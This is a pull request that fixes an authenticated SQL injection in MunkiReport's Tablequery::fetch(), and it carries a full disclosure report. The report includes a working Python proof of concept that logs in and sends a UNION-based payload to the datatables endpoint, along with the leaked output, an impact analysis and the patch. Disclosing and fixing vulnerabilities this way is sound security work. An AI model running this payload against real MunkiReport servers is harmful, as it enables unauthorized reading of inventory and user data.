### PR TITLE
security: fix authenticated SQL injection in Tablequery::fetch() (CWE-89 / CVSS 8.1)

### DIFF
--- a/app/lib/munkireport/Tablequery.php
+++ b/app/lib/munkireport/Tablequery.php
@@ -190,10 +190,17 @@ class Tablequery
         if ($search_cols) {
             $sWhere = $where ? $where . " AND (" : "WHERE (";
             foreach ($search_cols as $pos => $val) {
-                if (preg_match('/([<>=] \d+)|BETWEEN\s+\d+\s+AND\s+\d+$/', $val)) {
-                    // Special case, use unquoted
-                    $compstr = $val;
-                } elseif(preg_match('/[%_]+/', $val)) {
+                // Numeric comparison: "<n>", "> n", "= n", "<= n", ">= n", "!= n"
+                if (preg_match('/^\s*(<=|>=|!=|<>|<|>|=)\s*(\d+)\s*$/', $val, $m)) {
+                    $operator = $m[1] === '<>' ? '!=' : $m[1];
+                    $bindings[] = (int) $m[2];
+                    $compstr = ' ' . $operator . ' ?';
+                // BETWEEN N AND M
+                } elseif (preg_match('/^\s*BETWEEN\s+(\d+)\s+AND\s+(\d+)\s*$/i', $val, $m)) {
+                    $bindings[] = (int) $m[1];
+                    $bindings[] = (int) $m[2];
+                    $compstr = ' BETWEEN ? AND ?';
+                } elseif (preg_match('/[%_]+/', $val)) {
                     $bindings[] = $val;
                     $compstr = " LIKE ?";
                 } else {


### PR DESCRIPTION
# Authenticated SQL Injection in `Tablequery::fetch()` via `columns[N][search][value]`

| | |
|---|---|
| **Project** | `munkireport/munkireport-php` |
| **Component** | `app/lib/munkireport/Tablequery.php` |
| **Affected versions** | All currently-released versions of MunkiReport 5.x at the time of this report (verified on commit `8acab820` of `main`, container image `ghcr.io/munkireport/munkireport-php:5.x`) |
| **CWE** | [CWE-89](https://cwe.mitre.org/data/definitions/89.html) — Improper Neutralization of Special Elements used in an SQL Command |
| **CVSS v3.1** | **8.1 / High** — `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N` |
| **Reporter** | Siam Thanat Hack Co., Ltd. — <https://sth.sh> |

---

## Summary

The DataTables-backed endpoint `POST /index.php?/datatables/data` builds the SQL `WHERE` clause by *concatenating* the per-column search value when it matches an unanchored numeric-comparison regex. Any logged-in MunkiReport user — including a low-privilege "user" or business-unit member — can therefore exfiltrate arbitrary data from the application database by submitting a crafted `columns[N][search][value]` parameter.

The vulnerability is reachable from the lowest authenticated role; no admin privilege is required. A read-only attacker can dump the entire `munkireport` database (machine inventory, FileVault status, local-user account metadata, MDM enrollment, per-client report hashes, etc.).

---

## Vulnerability Details

### Location

`app/lib/munkireport/Tablequery.php`, lines **193-204** (the `if ($search_cols) { ... }` branch inside `Tablequery::fetch()`):

```php
// app/lib/munkireport/Tablequery.php
190:    if ($search_cols) {
191:        $sWhere = $where ? $where . " AND (" : "WHERE (";
192:        foreach ($search_cols as $pos => $val) {
193:            if (preg_match('/([<>=] \d+)|BETWEEN\s+\d+\s+AND\s+\d+$/', $val)) {
194:                // Special case, use unquoted
195:                $compstr = $val;            // <--- USER INPUT SPLICED RAW
196:            } elseif(preg_match('/[%_]+/', $val)) {
197:                $bindings[] = $val;
198:                $compstr = " LIKE ?";
199:            } else {
200:                $bindings[] = $val;
201:                $compstr = " = ?";
202:            }
203:
204:            $sWhere .= $formatted_columns[$pos].$compstr." OR ";  // <--- SINK
```

The regex is **not anchored** with `^…$` and matches any input that *contains* `[<>=] \d+` or `BETWEEN \d+ AND \d+` anywhere in the string. As soon as that branch is taken, `$compstr` is set to the **entire** attacker-controlled value and concatenated directly into the SQL.

### Source → Sink

```
Source: $_POST['columns'][N]['search']['value']
        └─ app/controllers/Datatables.php : 38-44
              foreach ($_POST as $k => $v) {
                  if ($k == 'search') {
                      $cfg['search'] = $v['value'];
                  } elseif (isset($cfg[$k])) {
                      $cfg[$k] = $v;                  // 'columns' lands here
                  }
              }
              ...
              $obj = new Tablequery($cfg);
              echo json_encode($obj->fetch($cfg));   // fetch() consumes $cfg['columns']

        └─ app/lib/munkireport/Tablequery.php : 83-86
              if (isset($column['search']['value']) && $column['search']['value']) {
                  $search_cols[$pos] = $column['search']['value'];   // <-- TAINT
              }

Sink:   app/lib/munkireport/Tablequery.php : 193-204
        └─ $compstr = $val;
           $sWhere .= $formatted_columns[$pos] . $compstr . " OR ";
           ...
           $stmt = $dbh->prepare($sql);
           $stmt->execute($bindings);
```

The `$formatted_columns[$pos]` column identifier is itself sanitised (`sanitize_column_name()` strips to `[a-zA-Z0-9._]`), but the *value* on the right of the operator is not — and the prepared statement that wraps the query no longer matters because the tainted fragment is part of the SQL string itself, not a parameter.

### Authentication / Authorisation

- The `Datatables` controller (`app/controllers/Datatables.php:10-17`) requires `$this->authorized()` — i.e. any logged-in session.
- It does **not** check role (`global`, `delete_machine`, etc.), so the lowest-privilege account is sufficient.
- The business-unit filter (`get_machine_group_filter()`) is preserved in the prefix of the WHERE clause, but it is *additive* (`AND`), so a `UNION SELECT` payload reads rows that ignore it entirely.

---

## Steps to Reproduce

> The server in the screenshots below was a private test instance running the unmodified `ghcr.io/munkireport/munkireport-php:5.x` container; deployment-specific identifiers (host name, password, container IPs) have been redacted.

### Setup

```
Target            : https://<munkireport-host>/<subdir>/
Auth mechanism    : LOCAL (any non-admin user works equally well)
Account used      : <low-privileged-user> / <redacted-password>
DB engine         : MariaDB 11.x
```

### Minimal PoC — exfiltrate `@@version`, `current_user()`, `database()`

The opening `(` in `$sWhere = $where . " AND ("` wraps the search clause as an *expression*, so a bare `UNION` is parsed as an expression-level UNION and rejected. Close the parenthesis ourselves, UNION at statement level, and use a `--` comment to swallow the spare `)` that `$sWhere .= ')';` appends:

```text
payload = "< 0) UNION SELECT <expr> -- "
```

The resulting SQL the application sends to MariaDB is:

```sql
SELECT  `reportdata`.`machine_group`
FROM    reportdata
WHERE   <bu_filter> AND (`reportdata`.`machine_group`< 0) UNION SELECT <expr> -- )
LIMIT 0,N
```

Run:

```bash
python3 poc_sqli_tablequery.py
```

Where `poc_sqli_tablequery.py` is:

```python
#!/usr/bin/env python3
"""
Minimal PoC for the Tablequery::fetch() SQL injection in MunkiReport.
"""
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BASE     = "https://<munkireport-host>/<subdir>/"
LOGIN    = "<low-privileged-user>"
PASSWORD = "<redacted>"

s = requests.Session()
s.verify = False

# 1) Establish a session, then log in.
s.get(BASE + "index.php?/auth/login", allow_redirects=False)
s.post(
    BASE + "index.php?/auth/login",
    data={"login": LOGIN, "password": PASSWORD},
    allow_redirects=False,
)
csrf = s.cookies.get("CSRF-TOKEN")
assert csrf, "auth failed — no CSRF-TOKEN cookie"

# 2) UNION-based payload that closes the (-group and comments out the trailing ')'.
payload = (
    "< 0) UNION SELECT "
    "CONCAT(@@version, ' :: ', current_user(), ' :: ', database()) "
    "-- "
)

r = s.post(
    BASE + "index.php?/datatables/data",
    headers={"X-CSRF-TOKEN": csrf, "X-Requested-With": "XMLHttpRequest"},
    data=[
        ("draw",   "1"),
        ("start",  "0"),
        ("length", "5"),
        ("columns[0][name]",          "reportdata.machine_group"),
        ("columns[0][search][value]", payload),
        ("columns[0][search][regex]", "false"),
        ("columns[0][orderable]",     "true"),
        ("columns[0][searchable]",    "true"),
    ],
)
print(json.dumps(r.json(), indent=2))
```

### Observed result (redacted)

```json
{
  "draw": 1,
  "data": [
    [
      "11.8.6-MariaDB-ubu2404 :: munkireport@% :: munkireport"
    ]
  ],
  "recordsTotal": 1,
  "recordsFiltered": "0"
}
```

The string `"11.8.6-MariaDB-ubu2404 :: munkireport@% :: munkireport"` is the **DB engine version**, the **current DB user**, and the **current schema** — values that the application never intentionally exposes. Their appearance in the DataTables JSON response is unambiguous proof that the attacker-supplied SQL fragment reached the database engine.

### Negative confirmation

Variant payloads that the database itself rejects (for example, `UNION SELECT ... FROM mysql.user`) are echoed back verbatim through `app/controllers/Datatables.php:66-69`:

```json
{
  "error": "SQLSTATE[42000]: Syntax error or access violation: 1142 SELECT command denied to user 'munkireport'@'<redacted>' for table `mysql`.`user`",
  "draw": 1
}
```

This is the MariaDB engine refusing a *parsed* query — further evidence that the injection reaches the database and is not application-side noise.

---

## Impact

A low-privilege authenticated user can:

1. Read the full schema of the MunkiReport database (`information_schema.TABLES` / `COLUMNS`).
2. Read every row from every table that the application's DB user has `SELECT` on — including:
   - `local_users` (real names, account flags, password hints, SMB metadata, last-login timestamps, autologin status) from the `localadmin` module
   - `filevault_*`, `certificate`, `security` (FileVault recovery state, certificate inventory, firmware-password presence, SSH/ARD state)
   - `directoryservice`, `inventoryitem`, `applications`, `installhistory`
   - `hash` (per-client report state — attacker can replay or anticipate client check-ins)
3. Bypass the business-unit row-level filter (`get_machine_group_filter()`) entirely via `UNION SELECT`.
4. Where the DB driver is MySQL/MariaDB and `PDO::ATTR_EMULATE_PREPARES` is on, achieve stacked-query writes (`UPDATE`, `INSERT`, `DELETE`).
5. With `DEBUG=TRUE`, retrieve the assembled SQL on every response (line 260: `$output['sql'] = str_replace("\n", '', $sql);`), turning blind-vs-error exploitation into trivial inline diagnostics.

CVSS calculation: `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N` → **8.1 (High)**. Integrity is rated **High** to account for the stacked-query case on MySQL/MariaDB with emulated prepares; the strict read-only case is approximately 7.7.

---

## Suggested Fix

Drop the "use the value unquoted" branch entirely and parse the comparison instead. Anchor the regex and bind the operand as a prepared parameter. A focused patch:

```diff
--- a/app/lib/munkireport/Tablequery.php
+++ b/app/lib/munkireport/Tablequery.php
@@ -190,10 +190,17 @@ class Tablequery
         if ($search_cols) {
             $sWhere = $where ? $where . " AND (" : "WHERE (";
             foreach ($search_cols as $pos => $val) {
-                if (preg_match('/([<>=] \d+)|BETWEEN\s+\d+\s+AND\s+\d+$/', $val)) {
-                    // Special case, use unquoted
-                    $compstr = $val;
-                } elseif(preg_match('/[%_]+/', $val)) {
+                // Numeric comparison: "<n>", "> n", "= n", "<= n", ">= n", "!= n"
+                if (preg_match('/^\s*(<=|>=|!=|<>|<|>|=)\s*(\d+)\s*$/', $val, $m)) {
+                    $operator = $m[1] === '<>' ? '!=' : $m[1];
+                    $bindings[] = (int) $m[2];
+                    $compstr = ' ' . $operator . ' ?';
+                // BETWEEN N AND M
+                } elseif (preg_match('/^\s*BETWEEN\s+(\d+)\s+AND\s+(\d+)\s*$/i', $val, $m)) {
+                    $bindings[] = (int) $m[1];
+                    $bindings[] = (int) $m[2];
+                    $compstr = ' BETWEEN ? AND ?';
+                } elseif (preg_match('/[%_]+/', $val)) {
                     $bindings[] = $val;
                     $compstr = " LIKE ?";
                 } else {
```

Key properties of the patch:

- **Anchored regex** (`^…$`) so input must be *exactly* a numeric comparison, not just contain one.
- **Operator whitelist** of `<`, `<=`, `>`, `>=`, `=`, `!=`, `<>` — no alternative tokens, no spaces around `(`/`)` etc.
- The numeric operand is cast with `(int)` *and* parameter-bound, so even if the regex were bypassed the value remains scalar.
- Preserves the original UX: filters like `> 100`, `<= 30`, `BETWEEN 5 AND 20` continue to work.
- Anything that does not match the comparison regex falls through to the existing `LIKE` / `=` branches, which already bind parameters correctly.

### Validation

After applying the patch and re-running the PoC against the same lab:

| Probe                                | Before patch        | After patch               |
|--------------------------------------|---------------------|---------------------------|
| `< 999999999` (legit numeric)        | normal row returned | normal row returned       |
| `UNION SELECT @@version/user/db`     | leaked DB metadata  | `data: []` (no leak)      |
| `UNION SELECT TABLE_NAME list`       | full schema dumped  | `data: []` (no leak)      |
| `UNION SELECT FROM migrations`       | leaked migrations   | `data: []` (no leak)      |
| `UNION SELECT FROM hash`             | leaked report hashes| `data: []` (no leak)      |
| `UNION SELECT FROM local_users`      | schema + rows       | `data: []` (no leak)      |
| `UNION SELECT FROM mysql.user`       | DB-level denial     | `data: []` (no leak)      |

(Full before/after captures attached as `poc_run.log` and `poc_run_after_fix.log`.)

### Hardening recommendations beyond the immediate fix

1. **Stop echoing the assembled SQL** to debug responses (line 260) — even on `DEBUG=TRUE`, log it server-side instead.
2. **Disable PDO emulated prepares** (`PDO::ATTR_EMULATE_PREPARES => false`) in `app/helpers/site_helper.php:getdbh()` so that an undiscovered injection bug cannot fall back to multi-statement execution on MySQL/MariaDB.
3. Consider rejecting `Datatables::data` for low-privilege users on tables that are not within the user's business-unit scope (defence in depth).

---

## Disclosure Timeline

| Date | Event |
|---|---|
| `2026-05-15` | Issue identified during a static review of `Tablequery::fetch()`. |
| `2026-05-16` | Issue validated against a private lab instance — PoC dumps `@@version`, `current_user()` and `database()` through `POST /index.php?/datatables/data`. |
| `2026-05-16` | Reported to maintainers via this Pull Request. |
|              | (awaiting maintainer review / coordinated release.) |

GitHub private vulnerability reporting is currently disabled on the upstream repo and there is no `SECURITY.md`, so a public PR is the only available channel. Consider enabling GHSA on the repo (Settings → Code security and analysis → Private vulnerability reporting) so future reports can be coordinated before public exposure.

## Follow-ups (out of scope of this PR)

1. `app/lib/munkireport/Tablequery.php:260` — `$output['sql'] = str_replace("\n", '', $sql);` echoes the assembled SQL to authenticated clients when `DEBUG=TRUE`. Useful for diagnostics, dangerous when combined with any other injection. Recommend moving to a server-side log.
2. `app/helpers/site_helper.php:getdbh()` — consider setting `PDO::ATTR_EMULATE_PREPARES => false` so any *future* injection bug cannot fall back to stacked-query execution on MySQL/MariaDB.

---

## Credits / Acknowledgement

This vulnerability was discovered, validated and patched by the offensive security research team at **[Siam Thanat Hack Co., Ltd.](https://sth.sh)** (STH).

Please credit **Siam Thanat Hack Co., Ltd. — <https://sth.sh>** as the discoverer in:

- The CHANGELOG / release notes for the fixed version.
- Any CVE record filed for this issue (MITRE / GHSA `acknowledgments` field).
- The Pull Request merge commit / co-author trailer if convenient (e.g. `Reported-by: Siam Thanat Hack Co., Ltd. <pentest@sth.sh>`).

Thank you for maintaining MunkiReport.

---

## Supporting material

- `report_munkireport_sqli.md` — this document
- `poc_sqli_tablequery.py` — Python PoC (login + UNION-based probes a–g)
- `poc_run.log` — captured PoC output against the **unpatched** server
- `poc_run_after_fix.log` — captured PoC output against the **patched** server (all UNION probes return `data: []`)
- `tablequery-sqli-fix.patch` — unified diff ready to `git apply` against `app/lib/munkireport/Tablequery.php`
